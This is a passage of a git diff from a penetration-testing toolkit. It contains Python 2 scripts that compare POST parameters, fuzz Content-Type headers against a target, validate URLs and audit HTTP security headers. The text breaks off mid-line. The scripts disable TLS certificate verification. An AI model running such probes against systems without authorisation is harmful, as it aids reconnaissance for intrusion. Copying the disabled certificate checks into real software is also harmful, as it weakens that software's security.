@@ -1,98 +1,98 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-2018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import urlparse - -from argparse import RawTextHelpFormatter - -################################ - -if __name__ == '__main__': - - parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter) - - parser.add_argument("-i1", "--input1", - action="store", - metavar='POST_data', - dest='input1', - type=str, - default=None, - required=True, - help='POST data to compare') - - parser.add_argument("-i2", "--input2", - action="store", - metavar='POST_data', - dest='input2', - type=str, - default=None, - required=True, - help='POST data to compare') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit(1) - - args = parser.parse_args() - - input1_params = urlparse.parse_qs(args.input1, True) - input1_params = set().union(input1_params.keys()) - - input2_params = urlparse.parse_qs(args.input2, True) - input2_params = 
set().union(input2_params.keys()) - - unique_params = input1_params.union(input2_params) - - params1_not_params2 = list(input1_params - input2_params) - params2_not_params1 = list(input2_params - input1_params) - - print - print "[+] Unique parameters" - print - print ', '.join(unique_params) - - print - print - print "[+] Parameters in input1 and not in input2" - print - print ', '.join(params1_not_params2) - - print - print "[+] Parameters in input2 and not in input1" - print - print ', '.join(params2_not_params1) +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-2018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. 
+ +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import urlparse + +from argparse import RawTextHelpFormatter + +################################ + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter) + + parser.add_argument("-i1", "--input1", + action="store", + metavar='POST_data', + dest='input1', + type=str, + default=None, + required=True, + help='POST data to compare') + + parser.add_argument("-i2", "--input2", + action="store", + metavar='POST_data', + dest='input2', + type=str, + default=None, + required=True, + help='POST data to compare') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + + args = parser.parse_args() + + input1_params = urlparse.parse_qs(args.input1, True) + input1_params = set().union(input1_params.keys()) + + input2_params = urlparse.parse_qs(args.input2, True) + input2_params = set().union(input2_params.keys()) + + unique_params = input1_params.union(input2_params) + + params1_not_params2 = list(input1_params - input2_params) + params2_not_params1 = list(input2_params - input1_params) + + print + print "[+] Unique parameters" + print + print ', '.join(unique_params) + + print + print + print "[+] Parameters in input1 and not in input2" + print + print ', '.join(params1_not_params2) + + print + print "[+] Parameters in input2 and not in input1" + print + print ', '.join(params2_not_params1) diff --git a/web/content-type-checker.py b/web/content-type-checker.py index 41bad42..64085b6 100644 --- a/web/content-type-checker.py +++ b/web/content-type-checker.py 
@@ -1,207 +1,207 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel", "nma-io"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - - -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) -import sys -import os -import argparse -from argparse import RawTextHelpFormatter -from termcolor import colored - - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def load_request(filename): - post_data = '' - headers = {} - method = '' - uri = '' - - with open(filename) as f: - index = 0 - potential_data = False - - for line in f: - if index == 0: - first_line = line - if ' ' not in first_line: - raise Exception('[-] Invalid request file!') - - first_line = first_line.split(' ') - method = first_line[0].lower() #GET POST 
etc - uri = first_line[1] - index = 1 - continue - - if potential_data: - post_data = line - break - - if ':' in line: - words = line.split(':', 1) - headers[words[0].strip()] = words[1].strip() - - if line.strip() == '': - potential_data = True - - url = '{}://{}{}'.format('https', headers['Host'], uri) - - return url, headers, post_data, method - - -def load_contentTypes(filename, ack = True): - u = [] - - if ack: - print '[+] Loading content types from file {}...'.format(filename) - - with open(filename) as f: - for line in f: - if line.startswith('#'): - continue - if '/' in line: - u.append(line.strip()) - - return u - - -def main(): - parser = argparse.ArgumentParser(description='{}'.format(red('Test Content Types')), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-t", "--content-types", - action="store", - metavar='FILE', - dest='contentTypesFile', - type=str, - default=None, - required=True, - help='File containing contant types.') - - parser.add_argument("-r", "--request", - action="store", - metavar='FILE', - dest='requestFile', - type=str, - default=None, - required=True, - help='File containing http request (burp format).') - - parser.add_argument("-o", "--output", - action="store", - metavar='FILE', - dest='outputFile', - type=str, - default=None, - required=True, - help='File to write results.') - - parser.add_argument('-x', '--proxy', - action="store", - metavar='PROXY', - dest='proxy', - type=str, - default=None, - required=True, - help='Use proxy (eg. 
http://127.0.0.1:8080).') - - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - if (not os.path.isfile(args.requestFile)): - print red('[-] Please provide an existing request file.') - sys.exit() - - if (not os.path.isfile(args.contentTypesFile)): - print red('[-] Please provide an existing content types file.') - sys.exit() - - - contentTypes = load_contentTypes(args.contentTypesFile, False) - length = len(contentTypes) - if length ==0: - print red('[-] Content Types file is empty\n') - - i=1 - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - with open(args.outputFile, 'a') as ptfile: - for ct in contentTypes: - - print '[+] {}/{}({}%)\n'.format(i, length, (i*100)/length) #progress - print '[+] Checking content type {}'.format(cyan(ct)) - - requestName = os.path.splitext(os.path.basename(args.requestFile))[0] - print '[+] Request: {}'.format(cyan(requestName)) - - url, headers, post_data, method = load_request(args.requestFile) - headers['Content-Type']=ct - - try: - r = getattr(requests, method)(url, proxies=proxies, verify=False,headers=headers, data=post_data) - except: - print red('[-] Unexpected error') - continue - - ptfile.write('{}:{}:{} {}\n'.format(ct, requestName, r.status_code, requests.status_codes._codes[r.status_code][0].upper())) - print yellow('[+] {} {}').format(r.status_code, requests.status_codes._codes[r.status_code][0].upper()) - print '' - - i += 1 - - -if __name__ == '__main__': - main() - - +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel", "nma-io"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import sys +import os +import argparse +from argparse import RawTextHelpFormatter +from termcolor import colored + + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def load_request(filename): + post_data = '' + headers = {} + method = '' + uri = '' + + with open(filename) as f: + index = 0 + potential_data = False + + for line in f: + if index == 0: + first_line = line + if ' ' not in first_line: + raise Exception('[-] Invalid request file!') + + first_line = first_line.split(' ') + method = first_line[0].lower() #GET POST etc + uri = first_line[1] + index = 1 + continue + + if potential_data: + post_data = line + break + + if ':' in line: + words = line.split(':', 1) + headers[words[0].strip()] = words[1].strip() + + if line.strip() == '': + potential_data = True + + url = '{}://{}{}'.format('https', headers['Host'], uri) + + return url, headers, post_data, method + + +def load_contentTypes(filename, ack = True): + u = [] + + if ack: + print '[+] Loading content types from file 
{}...'.format(filename) + + with open(filename) as f: + for line in f: + if line.startswith('#'): + continue + if '/' in line: + u.append(line.strip()) + + return u + + +def main(): + parser = argparse.ArgumentParser(description='{}'.format(red('Test Content Types')), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-t", "--content-types", + action="store", + metavar='FILE', + dest='contentTypesFile', + type=str, + default=None, + required=True, + help='File containing contant types.') + + parser.add_argument("-r", "--request", + action="store", + metavar='FILE', + dest='requestFile', + type=str, + default=None, + required=True, + help='File containing http request (burp format).') + + parser.add_argument("-o", "--output", + action="store", + metavar='FILE', + dest='outputFile', + type=str, + default=None, + required=True, + help='File to write results.') + + parser.add_argument('-x', '--proxy', + action="store", + metavar='PROXY', + dest='proxy', + type=str, + default=None, + required=True, + help='Use proxy (eg. 
http://127.0.0.1:8080).') + + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + if (not os.path.isfile(args.requestFile)): + print red('[-] Please provide an existing request file.') + sys.exit() + + if (not os.path.isfile(args.contentTypesFile)): + print red('[-] Please provide an existing content types file.') + sys.exit() + + + contentTypes = load_contentTypes(args.contentTypesFile, False) + length = len(contentTypes) + if length ==0: + print red('[-] Content Types file is empty\n') + + i=1 + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + with open(args.outputFile, 'a') as ptfile: + for ct in contentTypes: + + print '[+] {}/{}({}%)\n'.format(i, length, (i*100)/length) #progress + print '[+] Checking content type {}'.format(cyan(ct)) + + requestName = os.path.splitext(os.path.basename(args.requestFile))[0] + print '[+] Request: {}'.format(cyan(requestName)) + + url, headers, post_data, method = load_request(args.requestFile) + headers['Content-Type']=ct + + try: + r = getattr(requests, method)(url, proxies=proxies, verify=False,headers=headers, data=post_data) + except: + print red('[-] Unexpected error') + continue + + ptfile.write('{}:{}:{} {}\n'.format(ct, requestName, r.status_code, requests.status_codes._codes[r.status_code][0].upper())) + print yellow('[+] {} {}').format(r.status_code, requests.status_codes._codes[r.status_code][0].upper()) + print '' + + i += 1 + + +if __name__ == '__main__': + main() + + diff --git a/web/extract-urls.py b/web/extract-urls.py index 54668ce..8416180 100644 --- a/web/extract-urls.py +++ b/web/extract-urls.py 
@@ -1,136 +1,136 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -################################################## - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################################## - -from datetime import datetime -import signal -from urllib2 import urlopen -import re -import os -import sys -import argparse -from argparse import RawTextHelpFormatter -from termcolor import colored - -################################################## - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def signal_handler(signal, frame): - sys.exit(0) - -################################################## - -def main(): - parser = argparse.ArgumentParser(description='{}'.format(cyan('Extract URLs')), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-f", "--filename", 
action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') - parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='log.txt', required=False, help='File to write results.') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - print '\n[*] Extract URLs from file.' - - if (not os.path.isfile(args.filename)): - print red('[-] Please provide an existing file.\n') - sys.exit() - - with open(args.outputFile, 'a') as logfile: - - logfile.write('\n---\n\n') - - print '[*] Reading file {}..'.format(args.filename) - logfile.write('{}: Reading file {}\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), args.filename)) - - filename = open(args.filename) - content = filename.read() - - print '[*] Extracting URLs..' - logfile.write('{}: Extracting URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) - - urls = re.findall(r'(?Phttps?://[^\s]+)', content)#(https?://\S+) - urls = [u.replace(')', '') for u in urls] #markdown urls contain ) at the end of url - - print green('[*] Found {} URLs.'.format(len(urls))) - logfile.write('{}: Found {} URLs.\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), len(urls))) - - print '[*] Validating URLs..' 
- logfile.write('{}: Validating URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) - - invalidUrls = 0 - validUrls = 0 - - for u in urls: - dt = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S') - code = urlopen(u).code - if (code / 100 >= 4): - print red('[-] Invalid URL ({}) {}'.format(code, u)) - logfile.write('{}: Invalid URL ({}) {}\n'.format(dt, code, u)) - invalidUrls += 1 - else: - print green('[+] Valid URL ({}) {}'.format(code, u)) - logfile.write('{}: Valid URL ({}) {}\n'.format(dt, code, u)) - validUrls += 1 - - print '\n' - print '[*] Valid URLs: {}'.format(validUrls) - logfile.write('Valid URLs: {}\n'.format(validUrls)) - print '[*] Invalid URLs: {}'.format(invalidUrls) - logfile.write('Invalid URLs: {}\n'.format(invalidUrls)) - - print '\n' - -################################################## - -if __name__ == '__main__': - signal.signal(signal.SIGINT, signal_handler) - main() - +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. 
+ +""" + +################################################## + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################################## + +from datetime import datetime +import signal +from urllib2 import urlopen +import re +import os +import sys +import argparse +from argparse import RawTextHelpFormatter +from termcolor import colored + +################################################## + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def signal_handler(signal, frame): + sys.exit(0) + +################################################## + +def main(): + parser = argparse.ArgumentParser(description='{}'.format(cyan('Extract URLs')), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') + parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='log.txt', required=False, help='File to write results.') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + print '\n[*] Extract URLs from file.' + + if (not os.path.isfile(args.filename)): + print red('[-] Please provide an existing file.\n') + sys.exit() + + with open(args.outputFile, 'a') as logfile: + + logfile.write('\n---\n\n') + + print '[*] Reading file {}..'.format(args.filename) + logfile.write('{}: Reading file {}\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), args.filename)) + + filename = open(args.filename) + content = filename.read() + + print '[*] Extracting URLs..' 
+ logfile.write('{}: Extracting URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) + + urls = re.findall(r'(?Phttps?://[^\s]+)', content)#(https?://\S+) + urls = [u.replace(')', '') for u in urls] #markdown urls contain ) at the end of url + + print green('[*] Found {} URLs.'.format(len(urls))) + logfile.write('{}: Found {} URLs.\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), len(urls))) + + print '[*] Validating URLs..' + logfile.write('{}: Validating URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) + + invalidUrls = 0 + validUrls = 0 + + for u in urls: + dt = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S') + code = urlopen(u).code + if (code / 100 >= 4): + print red('[-] Invalid URL ({}) {}'.format(code, u)) + logfile.write('{}: Invalid URL ({}) {}\n'.format(dt, code, u)) + invalidUrls += 1 + else: + print green('[+] Valid URL ({}) {}'.format(code, u)) + logfile.write('{}: Valid URL ({}) {}\n'.format(dt, code, u)) + validUrls += 1 + + print '\n' + print '[*] Valid URLs: {}'.format(validUrls) + logfile.write('Valid URLs: {}\n'.format(validUrls)) + print '[*] Invalid URLs: {}'.format(invalidUrls) + logfile.write('Invalid URLs: {}\n'.format(invalidUrls)) + + print '\n' + +################################################## + +if __name__ == '__main__': + signal.signal(signal.SIGINT, signal_handler) + main() + diff --git a/web/headers-checker.py b/web/headers-checker.py index 69a96ca..ce47bfd 100644 --- a/web/headers-checker.py +++ b/web/headers-checker.py 
@@ -1,325 +1,325 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-1018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel", "nma-io"] -__license__ = "GPLv3" -__version__ = "0.8" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import os -import requests - -from urlparse import urlparse -from termcolor import colored -from argparse import RawTextHelpFormatter - -################################ - -from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning - -################################ - -def print_request(req): - output = '\n' - output += '{} {} HTTP/1.1\n'.format(req.method, req.url) - host = urlparse(req.url).hostname - output += 'Host: {}\n'.format(host) - output += '\n'.join(['%s: %s' % (key, value) for (key, value) in req.headers.items()]) - output += '\n' - return output - -################################ - -def print_response(resp, req): - output = '\n' - output += '\n'.join(['%s: %s' % (key, 
value) for (key, value) in resp.headers.items()]) - output += '\n\n[...]\n' - return output - -################################ - -def _analyzeHost(host, proxies): - try: - data = requests.get(host, verify=False, proxies=proxies, timeout=5, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'}) - req = print_request(data.request) - except requests.exceptions.ConnectionError as e: - print '[-] {}: Connection Error ({})'.format(host, e) - return None, None, None - except Exception as e: - print '[-] {}: No Data ({})'.format(host, e) - return None, None, None - - if not data: - print '[-] {}: No Data'.format(host) - return None, None, None - - if data.status_code not in range(200, 209): - print '[-] {}: Status code {}'.format(host, data.status_code) - return None, None, None - - print '[+] {}: {} {}'.format(host, data.status_code, requests.status_codes._codes[data.status_code][0].upper()) - - resp = print_response(data, data.request) - - headers = data.headers - - return headers, req, resp - -################################ - -def _checkHeaders(headers, https, text=False): - results = [] - - secureHeaders = { - 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', - 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', - 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', - 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', - 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies', - 'Referrer-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#rp', - 'Cache-control':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)', - 
'Pragma':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)' - } - - if https: - secureHeaders.update({ - 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', - 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' - }) - - if text: - for h in list(secureHeaders): - if h not in headers: - results.append('{}'.format(h)) - else: - for h in list(secureHeaders): - if h not in headers: - results.append('{}: {}'.format(h, secureHeaders[h])) - return results - -################################ - -def _checkInfoLeak(headers): - results = [] - - InfoLeakHeaders = { - 'Server', - 'X-Forwarded-For', - 'X-AspNetMvc-Version', - 'X-NvRenderingEngine', - 'X-AspNet-Version', - 'X-Powered-By', - 'Via' - } - - for h in list(InfoLeakHeaders): - if h in headers: - results.append('{}: {}'.format(h, headers[h])) - - return results - -################################ - -def checkHosts(hosts, output, text, proxies, req, resp): - http_headers_vulns = '' - - for host in hosts: - if '://' not in host: - print '[-] {}: Invalid host'.format(host) - continue - - https = False - if 'https' in host: - https = True - - print '[+] {}: Checking headers'.format(host) - - results, reqtext, resptext = _analyzeHost(host, proxies) - - if req and reqtext: - print '[+] {}: Request'.format(host) - print reqtext - - if not results: - print '[-] {}: An error occured during host analysis\n'.format(host) - continue - - http_headers_vulns = _checkHeaders(results, https, text) - if not http_headers_vulns: - print '[-] {}: An error occured during secure headers analysis\n'.format(host) - continue - - http_infoleak_vulns = _checkInfoLeak(results) - if not http_infoleak_vulns: - print '[-] {}: An error occured during headers information leakage analysis\n'.format(host) - continue - - if text: - data = 
'\n{}\n'.format('\n'.join(http_headers_vulns)) - data2 = '\n{}\n'.format('\n'.join(http_infoleak_vulns)) - else: - data = '\t* {}'.format('\n\t* '.join(http_headers_vulns)) - data2 = '\t* {}'.format('\n\t* '.join(http_infoleak_vulns)) - - if resp and resptext: - print '[+] {}: Response'.format(host) - print resptext - - print '[+] {}: Missing OWASP Secure Headers:'.format(host) - print data - - print '[+] {}: Headers Leaking Information:'.format(host) - print data2 - - print '[+] {}: Finish'.format(host) - print '' - - if output: - with open('{}\{}.md'.format(output, host.replace('http://', '')), 'w') as f: - f.write('## Target {}\n\n'.format(host)) - f.write('### Missing OWASP secure headers\n') - f.write(data.replace('\n', '\n* ')[:-2]) - f.write('\n') - f.write('### Headers leaking information\n') - f.write(data2.replace('\n', '\n* ')[:-2]) - if reqtext: - f.write('\n### HTTP Request\n\n') - f.write('```') - f.write('{}'.format(reqtext)) - f.write('```\n') - if resptext: - f.write('\n### HTTP Response\n\n') - f.write('```') - f.write('{}'.format(resptext)) - f.write('```\n') - -################################ - -message = """ - _____ _ _ _ -/ ___| | | | | | | -\ `--. ___ ___ _ _ _ __ ___ | |_| | ___ __ _ __| | ___ _ __ ___ - `--. \/ _ \/ __| | | | '__/ _ \ | _ |/ _ \/ _` |/ _` |/ _ \ '__/ __| -/\__/ / __/ (__| |_| | | | __/ | | | | __/ (_| | (_| | __/ | \__ \\ -\____/ \___|\___|\__,_|_| \___| \_| |_/\___|\__,_|\__,_|\___|_| |__ / - - Headers Checker | @maldevel - Version: {} -""".format(__version__) - - -def MainFunc(): - parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) - - parser.add_argument("-H", "--host", - action="store", - metavar='hostname', - dest='host', - type=str, - default=None, - help='The host to check, e.g. 
http://example.com, https://example.com, http://192.168.1.1') - - parser.add_argument('-l', '--list', - action='store', - metavar='hostsfile', - dest='hostsfile', - type=str, - default=None, - help='Hosts list file path. Place each target host in new line.') - - parser.add_argument('-o', '--output', - action='store', - metavar='directory', - dest='output', - type=str, - default=None, - help='Output directory path') - - parser.add_argument('-x', '--proxy', - action="store", - metavar='PROXY', - dest='proxy', - type=str, - default=None, - required=False, - help='Use proxy (eg. http://127.0.0.1:8080).') - - parser.add_argument('-t', '--text', - action="store_true", - help='Print plain text results.') - - parser.add_argument('-r', '--request', - action="store_true", - help='Print request raw text.') - - parser.add_argument('-e', '--response', - action="store_true", - help='Print response raw text.') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit(1) - - args = parser.parse_args() - - print message - - host = args.host - flist = args.hostsfile - - if host and flist: - print '[-] {}: Please specify one host only (-H) or a file list of hosts (-l).'.format(host) - sys.exit(1) - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - if host: - checkHosts([args.host], args.output, args.text, proxies, args.request, args.response) - elif flist: - hosts = [] - with open(flist, 'r') as f: - hosts = f.read().splitlines() - checkHosts(hosts, args.output, args.text, proxies, args.request, args.response) - - -if __name__ == '__main__': - try: - MainFunc() - except KeyboardInterrupt: - print "Interrupted by user.." - except: - sys.exit() +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-1018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. 
+ + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel", "nma-io"] +__license__ = "GPLv3" +__version__ = "0.8" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import os +import requests + +from urlparse import urlparse +from termcolor import colored +from argparse import RawTextHelpFormatter + +################################ + +from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning + +################################ + +def print_request(req): + output = '\n' + output += '{} {} HTTP/1.1\n'.format(req.method, req.url) + host = urlparse(req.url).hostname + output += 'Host: {}\n'.format(host) + output += '\n'.join(['%s: %s' % (key, value) for (key, value) in req.headers.items()]) + output += '\n' + return output + +################################ + +def print_response(resp, req): + output = '\n' + output += '\n'.join(['%s: %s' % (key, value) for (key, value) in resp.headers.items()]) + output += '\n\n[...]\n' + return output + +################################ + +def _analyzeHost(host, proxies): + try: + data = requests.get(host, verify=False, proxies=proxies, 
